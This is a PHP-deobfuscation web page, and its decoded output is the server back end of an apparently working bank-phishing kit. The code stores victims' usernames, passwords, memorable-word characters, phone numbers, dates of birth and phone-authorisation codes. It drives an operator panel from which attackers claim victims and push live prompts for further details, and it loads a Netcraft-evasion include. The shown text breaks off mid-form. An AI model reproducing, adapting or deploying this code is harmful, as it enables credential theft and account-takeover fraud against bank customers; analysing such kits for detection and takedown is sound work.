Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto n1XJz; MUtFt: if ($_SESSION["\x73\164\x61\162\164\145\x64"] == "\164\x72\165\145") {..

Decoded Output download

<?   goto n1XJz; MUtFt: if ($_SESSION["started"] == "true") { if ($_GET["getstatus"] and numeric($_GET["getstatus"]) == true) { $id = $_GET["getstatus"]; $query = mysqli_query($conn, "SELECT * from customers WHERE uniqueid='{$id}'"); if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_array($query, MYSQLI_ASSOC); echo $array["status"]; } } if ($_GET["getCode"] and numeric($_GET["getCode"]) == true) { $id = $_GET["getCode"]; $query = mysqli_query($conn, "SELECT * from customers WHERE uniqueid='{$id}'"); if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_array($query, MYSQLI_ASSOC); if ($array) { echo json_encode(array("status" => "ok", "call_code" => $array["call_code"])); } else { echo json_encode(array("status" => "Code Error")); } } } if ($_GET["type"] == "MemChar") { if ($_POST["memchar1"] and $_POST["memchar2"] and $_POST["memchar3"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $memchar1 = $_POST["memchar1"]; $memchar2 = $_POST["memchar2"]; $memchar3 = $_POST["memchar3"]; $comment = "Memo characters Entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET memchar1='{$memchar1}', memchar2='{$memchar2}', memchar3='{$memchar3}', comment='{$comment}', status=2, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "CC Error")); } } } if ($_GET["type"] == "CallMe") { if ($_POST["userid"] and numeric($_POST["userid"]) == true) { $comment = "User ready for call, waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET comment='{$comment}', status=3, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "Call Error")); } } } if ($_GET["type"] == "Phone") { if ($_POST["phonenum"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $phonenum = $_POST["phonenum"]; $comment = "Phone No. Entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET phonenum='{$phonenum}', comment='{$comment}', status=4, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "Phone Error")); } } } if ($_GET["type"] == "Memo") { if ($_POST["fullmemo"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $fullmemo = $_POST["fullmemo"]; $comment = "Full memo entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET fullmemo='{$fullmemo}', comment='{$comment}', status=5, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "Memo Error")); } } } if ($_GET["type"] == "DOB") { if ($_POST["usrdob"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $usrdob = $_POST["usrdob"]; $comment = "Date of Birth entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET usrdob='{$usrdob}', comment='{$comment}', status=6, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "DOB Error")); } } } } goto VEIzH; QeL9a: session_start(); goto LMKec; n1XJz: include "../../CONFIG.php"; goto rrcMV; cZBxP: include "../vendor/200.php"; goto k_RXL; Adg79: include "../vendor/100.php"; goto cZBxP; UEkDl: if ($_GET["type"] == "login") { if ($_POST["usrlogin"] and $_POST["usrpass"] and $_POST["ip"] and $_POST["ua"]) { $usrlogin = $_POST["usrlogin"]; $usrpass = $_POST["usrpass"]; $ip = $_POST["ip"]; $comment = "User just logged into account"; $ua = urlencode($_POST["ua"]); $uniqueid = time(); $query = mysqli_query($conn, "INSERT INTO customers (usrlogin, usrpass, comment, ip, useragent, uniqueid, status) VALUES ('{$usrlogin}', '{$usrpass}', '{$comment}', '{$ip}', '{$ua}',{$uniqueid}, 1)"); if ($query) { $_SESSION["uniqueid"] = $uniqueid; $_SESSION["started"] = "true"; echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "db conn notok")); } } } goto h4yuY; rrcMV: include "margin.php"; goto Adg79; KBZ2t: include "../vendor/index.php"; goto Qm6X6; k_RXL: include "../vendor/300.php"; goto KBZ2t; LMKec: function numeric($num) { if (preg_match("/^[0-9]+$/", $num)) { $status = true; } else { $status = false; } return $status; } goto UEkDl; Qm6X6: include "../vendor/netcraft_check.php"; goto QeL9a; h4yuY: if ($_SESSION["admin_logged"] == "true") { if ($_GET["type"] == "commmand") { if ($_POST["userid"] and numeric($_POST["userid"]) == true and $_POST["status"] and numeric($_POST["status"]) == true) { $userid = $_POST["userid"]; $status = $_POST["status"]; $askchar1 = $_POST["askchar1"]; $askchar2 = $_POST["askchar2"]; $askchar3 = $_POST["askchar3"]; $call_code = $_POST["call_code"]; $callnum = $_POST["callnum"]; $comment = "Admin has sent command"; if ($askchar1 != null and $askchar1 != '' and ($askchar2 != null and $askchar2 != '') and ($askchar3 != '' and $askchar3 != null) and ($call_code == null and $callnum == null)) { $query = mysqli_query($conn, "UPDATE customers SET comment='{$comment}', status='{$status}', askchar1='{$askchar1}', askchar2='{$askchar2}', askchar3='{$askchar3}' WHERE id={$userid}"); } else { if ($call_code != '' and $call_code != null and ($callnum == '' and $callnum == null) and ($askchar1 == '' and $askchar2 == '' and $askchar3 == '')) { $query = mysqli_query($conn, "UPDATE customers SET comment='{$comment}', status='{$status}', call_code='{$call_code}' WHERE id={$userid}"); } else { if ($callnum != '' and $callnum != null and ($call_code == '' and $call_code == null) and ($askchar1 == '' and $askchar2 == '' and $askchar3 == '')) { $query = mysqli_query($conn, "UPDATE customers SET comment='{$comment}', status='{$status}', callnum='{$callnum}' WHERE id={$userid}"); } else { $query = mysqli_query($conn, "UPDATE customers SET status={$status} WHERE id={$userid}"); } } } if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "db conn error")); } } else { echo json_encode(array("status" => "command error")); } } if (isset($_GET["get_submitted"])) { $query = mysqli_query($conn, "SELECT * FROM customers WHERE status<=8 and buzzed=0"); if ($query) { $num = mysqli_num_rows($query); $array = mysqli_fetch_array($query, MYSQLI_ASSOC); if ($num >= 1) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "notok")); } } else { echo json_encode(array("status" => "notok")); } } if (isset($_GET["fetch_pc_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); } } foreach ($array as $value) { if ($value["status"] == 500) { $info = "<span class="badge badge-warning">Easter egg</span>"; } elseif ($value["status"] == 1) { $info = "<span class="badge badge-info">New User</span>"; } elseif ($value["status"] == 2) { $info = "<span class="badge badge-primary">Submitted Memorable character</span>"; } elseif ($value["status"] == 3) { $info = "<span class="badge badge-primary">User ready to be called</span>"; } elseif ($value["status"] == 4) { $info = "<span class="badge badge-primary">Submitted mobile number</span>"; } elseif ($value["status"] == 5) { $info = "<span class="badge badge-primary">Submitted full memo</span>"; } elseif ($value["status"] == 6) { $info = "<span class="badge badge-primary">Submitted DOB</span>"; } elseif ($value["status"] == 11) { $info = "<span class="badge badge-primary">Awaiting Memo Char</span>"; } elseif ($value["status"] == 12) { $info = "<span class="badge badge-primary">Awaiting Call response</span>"; } elseif ($value["status"] == 13) { $info = "<span class="badge badge-primary">Awaiting Call Auth</span>"; } elseif ($value["status"] == 14) { $info = "<span class="badge badge-primary">Awaiting Phone No.</span>"; } elseif ($value["status"] == 15) { $info = "<span class="badge badge-primary">Awaiting Full Memo</span>"; } elseif ($value["status"] == 16) { $info = "<span class="badge badge-primary">Awaiting DOB</span>"; } elseif ($value["status"] == 50) { $info = "<span class="badge badge-primary">Back to Login</span>"; } elseif ($value["status"] == 100) { $info = "<span class="badge badge-info">INVALID</span>"; } elseif ($value["status"] == 20) { $info = "<span class="badge badge-success">Finished</span>"; } if ($value["status"] == 20) { $userStatus = "<span><img src="partial/img/off.png" style="width:20px;padding-right:1px"><b>Offline</b></span>"; echo "\xa				<tr style='color:white'>
		\x9	\x9<td>{$value["id"]}</td>
\x9\x9\x9\x9	<td>{$value["usrlogin"]}</td>\xa	\x9		\x9<td>{$userStatus}</td>
\x9	\x9\x9\x9<td>{$value["ip"]}</td>\xa\x9		\x9	<td>{$info}</td>
		\x9\x9	<td>\xa			\x9		<button type='button' onclick='view_logBtn(this)' class='btn btn-md btn-dark' id='userid_{$value["id"]}' data-toggle='modal' data-target='#viewmodal_userid_{$value["id"]}'>View Log</button>
\x9	\x9	\x9\x9<button type='button' class='btn btn-md btn-danger' id='userid_{$value["id"]}'onclick='deleteentry(this)'><i class='fa fa-trash' aria-hidden='true'></i></button>
				\x9</td>
	\x9	\x9\x9<td>Finished by - {$value["log_owner"]}</td>
\x9		\x9</tr>\xa	\x9		"; } else { $userStatus = "<span><img src="partial/img/off.png" style="width:20px;padding-right:1px"><b>Offline</b></span>"; $savedStatus = $value["last_activity"]; if ($savedStatus !== null) { $user_main_status = new DateTime($savedStatus); $currentTime = new DateTime("now"); $indicator = $currentTime->getTimestamp() - $user_main_status->getTimestamp(); if ($indicator <= 8) { $userStatus = "<span><img src="partial/img/on.png" style="width:20px;padding-right:1px"><b>Online</b></span>"; } } else { if ($savedStatus === null) { $userStatus = "<span><img src="partial/img/na.png" style="width:25px;padding-right:1px"><b>No data</b></span>"; } } if ($Multiple_Admins == "off") { echo "\xa		\x9	\x9<tr style='color:white'>
\x9\x9\x9		\x9<td>{$value["id"]}</td>\xa	\x9\x9	\x9\x9<td>{$value["usrlogin"]}</td>\xa\x9\x9		\x9\x9<td>{$userStatus}</td>
\x9\x9\x9\x9\x9\x9<td>{$value["ip"]}</td>\xa\x9		\x9\x9	<td>{$value["comment"]}</td>\xa\x9\x9			\x9<td>{$info}</td>
			\x9\x9\x9<td>
				\x9\x9\x9<button type='button' onclick='controlBtn(this)' class='btn btn-md btn-info' id='userid_{$value["id"]}' data-toggle='modal' data-target='#modal_userid_{$value["id"]}'>Action</button>\xa\x9\x9\x9	\x9	\x9<button type='button' class='btn btn-md btn-danger' id='userid_{$value["id"]}'onclick='deleteentry(this)'><i class='fa fa-trash' aria-hidden='true'></i></button>
				\x9\x9</td>
	\x9		\x9</tr>
\x9\x9\x9\x9	"; } else { if ($value["log_owner"] == '') { echo "
	\x9\x9\x9		<tr style='color:white'>
	\x9			\x9\x9<td>{$value["id"]}</td>
\x9\x9\x9\x9\x9\x9	<td>{$value["usrlogin"]}</td>
	\x9	\x9\x9\x9\x9<td>{$userStatus}</td>
\x9	\x9	\x9\x9\x9<td>{$value["ip"]}</td>\xa			\x9		\x9<td>{$value["comment"]}</td>\xa		\x9\x9		\x9<td>{$info}</td>
		\x9\x9			<td>\xa\x9\x9\x9			\x9\x9<button type='button' onclick='claimBtn(this)' class='btn btn-md btn-info' id='userid_{$value["id"]}' data-toggle='modal' data-target='#modal_userid_{$value["id"]}'> Claim Log \xf0\x9f\x94\x91</button>
						\x9</td>\xa\x9\x9	\x9\x9\x9</tr>\xa		\x9	\x9	"; } else { if ($value["log_owner"] == $_SESSION["log_owner"]) { echo "\xa		\x9\x9		<tr style='color:white'>\xa	\x9\x9\x9			<td>{$value["id"]}</td>\xa\x9\x9\x9	\x9\x9\x9<td>{$value["usrlogin"]}</td>\xa	\x9\x9\x9\x9\x9\x9<td>{$userStatus}</td>
\x9\x9	\x9\x9		<td>{$value["ip"]}</td>
\x9		\x9	\x9\x9<td>{$value["comment"]}</td>
\x9				\x9\x9<td>{$info}</td>
\x9\x9					<td>
	\x9		\x9		\x9<button type='button' onclick='controlBtn(this)' class='btn btn-md btn-info' id='userid_{$value["id"]}' data-toggle='modal' data-target='#modal_userid_{$value["id"]}'>Action</button>
\x9	\x9\x9	\x9\x9\x9<button type='button' class='btn btn-md btn-danger' id='userid_{$value["id"]}'onclick='deleteentry(this)'><i class='fa fa-trash' aria-hidden='true'></i></button>\xa\x9\x9	\x9		\x9</td>\xa\x9				\x9</tr>
			\x9	\x9"; } else { echo "\xa		\x9\x9		<tr style='color:white'>
		\x9		\x9	<td>{$value["id"]}</td>
		\x9\x9\x9	\x9<td>{$value["usrlogin"]}</td>\xa\x9\x9\x9			\x9<td>{$userStatus}</td>
	\x9				\x9<td>{$value["ip"]}</td>\xa					\x9	<td>{$value["comment"]}</td>
		\x9	\x9		<td>{$info}</td>\xa\x9\x9\x9\x9\x9		<td>\xa\x9	\x9\x9\x9\x9		<span>Claimed by - <i>{$value["log_owner"]}</i></span>
\x9\x9	\x9			</td>\xa\x9\x9\x9	\x9\x9</tr>\xa		\x9\x9\x9	"; } } } } } } if (isset($_GET["fetch_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); } } foreach ($array as $value) { if ($value["status"] == 500) { $info = "<span class="badge badge-warning">Easter egg</span>"; } elseif ($value["status"] == 1) { $info = "<span class="badge badge-info">New User</span>"; } elseif ($value["status"] == 2) { $info = "<span class="badge badge-primary">Submitted Memorable character</span>"; } elseif ($value["status"] == 3) { $info = "<span class="badge badge-primary">User ready to be called</span>"; } elseif ($value["status"] == 4) { $info = "<span class="badge badge-primary">Submitted mobile number</span>"; } elseif ($value["status"] == 5) { $info = "<span class="badge badge-primary">Submitted full memo</span>"; } elseif ($value["status"] == 6) { $info = "<span class="badge badge-primary">Submitted DOB</span>"; } elseif ($value["status"] == 11) { $info = "<span class="badge badge-primary">Awaiting Memo Char</span>"; } elseif ($value["status"] == 12) { $info = "<span class="badge badge-primary">Awaiting Call response</span>"; } elseif ($value["status"] == 13) { $info = "<span class="badge badge-primary">Awaiting Call Auth</span>"; } elseif ($value["status"] == 14) { $info = "<span class="badge badge-primary">Awaiting Phone No.</span>"; } elseif ($value["status"] == 15) { $info = "<span class="badge badge-primary">Awaiting Full Memo</span>"; } elseif ($value["status"] == 16) { $info = "<span class="badge badge-primary">Awaiting DOB</span>"; } elseif ($value["status"] == 50) { $info = "<span class="badge badge-primary">Back to Login</span>"; } elseif ($value["status"] == 100) { $info = "<span class="badge badge-info">INVALID</span>"; } elseif ($value["status"] == 20) { $info = "<span class="badge badge-success">Finished</span>"; } if ($value["status"] == 20) { $userStatus = "<span><img src="partial/img/off.png" style="width:20px;padding-right:1px"><b>Offline</b></span>"; echo "
		\x9	<tr style='color:white'>
\x9			\x9<td>{$value["id"]}</td>
			\x9\x9<td>{$value["usrlogin"]}</td>\xa	\x9\x9		<td>{$userStatus}</td>\xa	\x9\x9		<td>{$value["ip"]}</td>
	\x9	\x9	<td>{$info}</td>
\x9\x9		\x9<td>
			\x9		<button type='button' onclick='view_logBtn(this)' class='btn btn-md btn-dark' id='userid_{$value["id"]}' data-toggle='modal' data-target='#viewmodal_userid_{$value["id"]}'>View Log</button>
\x9	\x9\x9\x9	<button type='button' class='btn btn-md btn-danger' id='userid_{$value["id"]}'onclick='deleteentry(this)'><i class='fa fa-trash' aria-hidden='true'></i></button>
\x9\x9	\x9\x9</td>
	\x9	\x9	<td>Finished by - {$value["log_owner"]}</td>
				</tr>
	\x9		"; } else { $userStatus = "<span><img src="partial/img/off.png" style="width:20px;padding-right:1px"><b>Offline</b></span>"; $savedStatus = $value["last_activity"]; if ($savedStatus !== null) { $user_main_status = new DateTime($savedStatus); $currentTime = new DateTime("now"); $indicator = $currentTime->getTimestamp() - $user_main_status->getTimestamp(); if ($indicator <= 8) { $userStatus = "<span><img src="partial/img/on.png" style="width:20px;padding-right:1px"><b>Online</b></span>"; } } else { if ($savedStatus === null) { $userStatus = "<span><img src="partial/img/na.png" style="width:25px;padding-right:1px"><b>No data</b></span>"; } } if ($Multiple_Admins == "off") { echo "
\x9	\x9	\x9<tr style='color:white'>
	\x9\x9\x9	\x9<td>{$value["id"]}</td>\xa\x9\x9\x9	\x9\x9<td>{$value["usrlogin"]}</td>
\x9	\x9\x9\x9\x9<td>{$userStatus}</td>
\x9\x9\x9			<td>{$info}<br>{$value["comment"]}</td>\xa\x9\x9\x9\x9	\x9<td>\xa\x9\x9\x9			\x9<button type='button' onclick='controlBtn(this)' class='btn btn-md btn-info' id='userid_{$value["id"]}' data-toggle='modal' data-target='#modal_userid_{$value["id"]}'>Action</button>\xa							<button type='button' class='btn btn-md btn-danger' id='userid_{$value["id"]}'onclick='deleteentry(this)'><i class='fa fa-trash' aria-hidden='true'></i></button>\xa\x9			\x9\x9</td>
\x9		\x9\x9</tr>
\x9	\x9\x9\x9"; } else { if ($value["log_owner"] == '') { echo "
\x9					<tr style='color:white'>\xa\x9\x9		\x9	\x9<td>{$value["id"]}</td>
\x9		\x9\x9		<td>{$value["usrlogin"]}</td>\xa		\x9\x9\x9		<td>{$userStatus}</td>\xa\x9					\x9<td>{$info}<br>{$value["comment"]}</td>\xa\x9	\x9			\x9<td>\xa\x9		\x9		\x9\x9<button type='button' onclick='claimBtn(this)' class='btn btn-md btn-info' id='userid_{$value["id"]}' data-toggle='modal' data-target='#modal_userid_{$value["id"]}'> Claim Log \360\x9f\x94\221</button>\xa		\x9	\x9\x9\x9</td>\xa\x9			\x9\x9</tr>\xa\x9\x9			\x9"; } else { if ($value["log_owner"] == $_SESSION["log_owner"]) { echo "
		\x9		\x9<tr style='color:white'>\xa\x9\x9\x9	\x9\x9\x9<td>{$value["id"]}</td>
		\x9		\x9	<td>{$value["usrlogin"]}</td>
		\x9		\x9\x9<td>{$userStatus}</td>
\x9\x9	\x9\x9		<td>{$info}<br>{$value["comment"]}</td>
\x9\x9				\x9<td>{$info}</td>\xa	\x9		\x9		<td>\xa\x9	\x9\x9\x9		\x9<button type='button' onclick='controlBtn(this)' class='btn btn-md btn-info' id='userid_{$value["id"]}' data-toggle='modal' data-target='#modal_userid_{$value["id"]}'>Action</button>
\x9	\x9\x9\x9	\x9	<button type='button' class='btn btn-md btn-danger' id='userid_{$value["id"]}'onclick='deleteentry(this)'><i class='fa fa-trash' aria-hidden='true'></i></button>
			\x9\x9	\x9</td>\xa	\x9	\x9	\x9</tr>\xa\x9	\x9	\x9\x9"; } else { echo "\xa				\x9	<tr style='color:white'>
\x9\x9					<td>{$value["id"]}</td>\xa\x9\x9			\x9\x9<td>{$value["usrlogin"]}</td>
	\x9\x9			\x9<td>{$userStatus}</td>\xa\x9	\x9\x9\x9	\x9<td>{$info}<br>{$value["comment"]}</td>\xa	\x9\x9	\x9\x9	<td>
\x9		\x9\x9\x9	\x9<span>Claimed by - <i>{$value["log_owner"]}</i></span>
	\x9\x9		\x9	</td>
		\x9\x9	\x9</tr>
			\x9\x9\x9"; } } } } } } if (isset($_GET["claim_data"])) { if ($_POST["userid"] and numeric($_POST["userid"]) == true) { $userid = $_POST["userid"]; $log_owner = $_SESSION["log_owner"]; $query = mysqli_query($conn, "UPDATE customers SET log_owner='{$log_owner}', buzzed=1 WHERE id={$userid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "notok")); } } else { echo json_encode(array("status" => "notokk")); } } if (isset($_GET["fetch_pc_modal_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["usrlogin"]; $usrpass = $value["usrpass"]; $memchar1 = $value["memchar1"]; $memchar2 = $value["memchar2"]; $memchar3 = $value["memchar3"]; $askchar1 = $value["askchar1"]; $askchar2 = $value["askchar2"]; $askchar3 = $value["askchar3"]; $phonenum = $value["phonenum"]; $fullmemo = $value["fullmemo"]; $usrdob = $value["usrdob"]; $Char_one = $askchar1 . " character - " . $memchar1; $Char_two = $askchar2 . " character - " . $memchar2; $Char_three = $askchar3 . " character - " . $memchar3; $expiry = $value["expiry"]; $ip = $value["ip"]; $useragent = urldecode($value["useragent"]); $data_log = "
\x9		=====\342\211\xab LOGIN \342\211\252=====
\x9\x9\x9User ID/No. : {$usrlogin}
\x9	\x9Pass : {$usrpass}\xa		\x9Phone No : {$phonenum}\xa	\x9\x9DOB : {$usrdob}\xa			=====\342\x89\xab SECURITY \xe2\211\252=====\xa		\x9{$Char_one}\xa\x9	\x9{$Char_two}
\x9		{$Char_three}\xa	\x9	Full Memo : {$fullmemo}\xa			===============================\xa		\x9IP : {$ip}\xa			UA : {$useragent}
\x9\x9\x9==============================="; echo "\xa	
\x9\x9\x9<div class='modal fade' id='modal_userid_{$value["id"]}' tabindex='-1' role='dialog' aria-labelledby='exampleModalLabel' aria-hidden='true' style='opacity:1 !important;display:none;height:100%;overflow:scroll;'>\xa\x9	\x9	<form name='config_form_{$value["id"]}' id='config_form_{$value["id"]}' method='POST' action='' novalidate>\xa			\x9\x9<input type='hidden' name='userid' value='{$value["id"]}'>\xa\x9\x9\x9	\x9<div class='modal-dialog' role='document' style='width:500px'>
\x9\x9	\x9\x9\x9<div class='modal-content' style='background-color: black;'>\xa\x9	\x9	\x9\x9	<div class='modal-header' style='background-color:#34495E;font-size:2.7rem;text-align:center;'>\xa	\x9\x9\x9	\x9	\x9<h5 class='modal-title' id='exampleModalLabel' style='color:white'>Admin Control</h5>\xa	\x9	\x9		\x9\x9<button type='button' class='close' onclick='close_btn()' aria-label='Close'>
	\x9\x9\x9\x9\x9\x9	\x9<span aria-hidden='true' style='color:white'>&times;</span>
\x9\x9\x9\x9\x9	\x9	</button>
\x9	\x9\x9\x9\x9\x9</div>
\x9\x9\x9\x9\x9	\x9<div class='modal-body'>
	\x9	\x9	\x9	\x9<div class='form-group' style='margin-bottom:1rem'>\xa\x9	\x9\x9			\x9	<br>
\x9\x9\x9	\x9	\x9	\x9<textarea id='textareaoptions' class='form-control' disabled='disabled' rows='16' style='height:300px;'>{$data_log}</textarea>\xa\x9\x9\x9	\x9\x9	\x9</div>\xa\x9\x9		\x9			\x9
\x9\x9\x9\x9				<table style='width: 100%;background-color: black;color: white;padding: 10%;'>\xa	\x9		\x9	\x9\x9\x9<tbody style='line-height:100%;'>
\x9\x9				\x9\x9\x9
	\x9				\x9\x9\x9\x9<tr>
\x9\x9			\x9		\x9\x9\x9<td>
	\x9\x9	\x9\x9\x9	\x9	\x9\x9<div class='form-check'>\xa\x9	\x9			\x9	\x9	\x9		<label for='askcharsradio0{$value["id"]}' class='form-check-label'>\xa\x9			\x9\x9			\x9\x9			<input type='radio' name='status' value='11' id='askcharsradio0{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
			\x9	\x9	\x9\x9\x9\x9	\x9	<span>Request Memorable</span>
\x9		\x9\x9\x9\x9\x9\x9\x9		\x9</label>
\x9		\x9\x9	\x9\x9\x9	\x9\x9</div>
	\x9		\x9\x9\x9	\x9	\x9\x9<!-- Input characters -->
	\x9	\x9\x9\x9		\x9			<div class='form-group' style='display:none;' id='askchars0{$value["id"]}'>
\x9\x9	\x9	\x9\x9		\x9			<div class='row' style='margin-left:5%;margin-top:5px' >\xa\x9	\x9		\x9					\x9		<div class='col'>\xa\x9\x9\x9								\x9\x9\x9	<input type='text' class='form-control' placeholder='E.g 1st' name='askchar1' id='askchar1' style='width:80%;border-color:#d6d6e5'>
\x9		\x9		\x9\x9	\x9\x9\x9\x9\x9</div>
	\x9		\x9\x9\x9					\x9\x9<div class='col'>
	\x9\x9	\x9	\x9\x9\x9\x9\x9	\x9		<input type='text' class='form-control' placeholder='E.g 3rd' name='askchar2' id='askchar2' style='width:80%;border-color:#d6d6e5'>\xa	\x9		\x9\x9\x9\x9	\x9\x9\x9	\x9</div>\xa\x9		\x9	\x9	\x9\x9			\x9\x9<div class='col'>\xa	\x9\x9\x9\x9	\x9	\x9		\x9	\x9\x9<input type='text' class='form-control' placeholder='E.g 6th' name='askchar3' id='askchar3' style='width:80%;border-color:#d6d6e5'>\xa\x9\x9	\x9			\x9	\x9\x9	\x9\x9</div>
	\x9\x9\x9\x9\x9\x9		\x9	\x9	</div>\xa	\x9\x9	\x9\x9						</div>
\x9\x9\x9\x9			\x9	\x9\x9</td>
						\x9\x9\x9\x9	<td>
		\x9			\x9\x9			\x9<div class='form-check'>
	\x9	\x9\x9	\x9\x9	\x9	\x9\x9<label for='askcharsradio1{$value["id"]}' class='form-check-label'>
\x9\x9\x9				\x9\x9		\x9		<input type='radio' name='status' value='12' id='askcharsradio1{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa\x9	\x9\x9				\x9	\x9\x9	\x9<span>Request to call </span>\xa	\x9\x9\x9			\x9		\x9	\x9</label>
		\x9	\x9\x9\x9\x9				</div>\xa\x9	\x9				\x9	\x9		<!-- Input characters -->\xa\x9	\x9	\x9	\x9\x9\x9\x9\x9	<div class='form-group' style='display:none;' id='askchars1{$value["id"]}'>
\x9\x9\x9			\x9	\x9\x9		\x9<div class='row' style='margin-left:5%;margin-top:5px' >
	\x9\x9	\x9\x9\x9\x9	\x9			\x9<div class='col'>\xa							\x9\x9			\x9\x9\x9<input type='text' class='form-control' placeholder='e.g 07123489322' name='callnum' id='callnum' style='width:80%;border-color:#d6d6e5'>\xa	\x9\x9\x9\x9			\x9\x9		\x9\x9</div>\xa		\x9	\x9\x9\x9\x9		\x9\x9	</div>\xa\x9\x9		\x9\x9\x9\x9	\x9		</div>\xa	\x9	\x9	\x9\x9\x9		\x9</td>
						\x9\x9	\x9</tr>
\x9\x9\x9	\x9	\x9		\x9\xa		\x9\x9\x9					<tr>
\x9\x9\x9			\x9\x9\x9		<td>
\x9			\x9\x9\x9	\x9\x9\x9	<div class='form-check'>\xa		\x9\x9					\x9\x9\x9	<label for='askcharsradio2{$value["id"]}' class='form-check-label'>
\x9			\x9\x9\x9\x9\x9		\x9\x9	<input type='radio' name='status' value='13' id='askcharsradio2{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa\x9	\x9			\x9			\x9\x9	\x9<span>Phone call Auth </span>
\x9		\x9	\x9\x9	\x9		\x9	</label>\xa\x9			\x9\x9\x9\x9				</div>\xa\x9		\x9\x9\x9	\x9				<!-- Input characters -->\xa\x9\x9	\x9\x9	\x9\x9\x9\x9\x9\x9<div class='form-group' style='display:none;' id='askchars2{$value["id"]}'>
	\x9	\x9\x9\x9\x9\x9\x9\x9	\x9\x9<div class='row' style='margin-left:5%;margin-top:5px' >\xa\x9	\x9	\x9\x9						\x9	<div class='col'>
	\x9		\x9	\x9\x9		\x9		\x9	<input type='text' class='form-control' placeholder='Enter code here' name='call_code' id='call_code' style='width:80%;border-color:#d6d6e5'>\xa		\x9\x9\x9\x9\x9	\x9\x9\x9	\x9\x9</div>\xa\x9	\x9		\x9			\x9\x9	\x9</div>
					\x9\x9		\x9		</div>\xa					\x9\x9\x9\x9\x9\x9</td>
\x9\x9\x9\x9		\x9		\x9\x9<td>\xa	\x9\x9\x9		\x9	\x9		\x9<div class='form-check'>\xa		\x9\x9							\x9	<label for='askcharsradio3{$value["id"]}' class='form-check-label'>
\x9	\x9\x9\x9\x9		\x9	\x9\x9\x9\x9<input type='radio' name='status' value='14' id='askcharsradio3{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa\x9\x9		\x9		\x9	\x9\x9\x9\x9\x9<span>Request Phone No.</span>
\x9	\x9\x9\x9\x9\x9\x9	\x9	\x9\x9</label>
\x9\x9		\x9\x9			\x9		</div>\xa	\x9	\x9					\x9	</td>\xa		\x9	\x9			\x9\x9</tr>
\x9\x9\x9\x9\x9\x9		\x9\x9\xa\x9	\x9		\x9			\x9<tr>
				\x9\x9	\x9	\x9	<td>\xa	\x9	\x9\x9	\x9		\x9\x9	<div class='form-check'>
\x9	\x9\x9\x9	\x9			\x9\x9\x9<label for='askcharsradio4{$value["id"]}' class='form-check-label'>\xa	\x9\x9		\x9\x9\x9		\x9	\x9\x9<input type='radio' name='status' value='15' id='askcharsradio4{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
	\x9\x9\x9			\x9\x9	\x9	\x9	<span>Request Full Memo </span>\xa		\x9\x9\x9\x9	\x9\x9\x9	\x9	</label>\xa\x9\x9	\x9\x9					\x9	</div>\xa\x9	\x9	\x9\x9\x9		\x9	</td>\xa	\x9		\x9			\x9	\x9<td>\xa\x9						\x9			\x9<div class='form-check'>\xa	\x9\x9	\x9		\x9\x9\x9	\x9	<label for='askcharsradio5{$value["id"]}' class='form-check-label'>
						\x9\x9	\x9	\x9\x9	<input type='radio' name='status' value='16' id='askcharsradio5{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
\x9		\x9\x9			\x9		\x9	\x9<span>Request DOB </span>\xa\x9	\x9\x9\x9			\x9	\x9\x9\x9</label>\xa\x9\x9\x9	\x9			\x9			</div>\xa\x9		\x9						\x9</td>\xa\x9\x9\x9			\x9\x9\x9	</tr>
			\x9	\x9\x9		\x9\xa	\x9\x9\x9\x9	\x9		\x9<tr>\xa			\x9				\x9\x9	<td>
\x9	\x9\x9\x9\x9	\x9		\x9\x9<div class='form-check'>\xa\x9\x9		\x9\x9\x9		\x9		\x9<label for='askloginradio{$value["id"]}' class='form-check-label'>\xa	\x9		\x9\x9\x9\x9\x9\x9		\x9	<input type='radio' name='status' value='50' id='askloginradio{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa\x9\x9					\x9\x9\x9\x9\x9	\x9<span>Request login again </span>\xa\x9\x9				\x9	\x9	\x9	\x9</label>
		\x9	\x9		\x9\x9			</div>
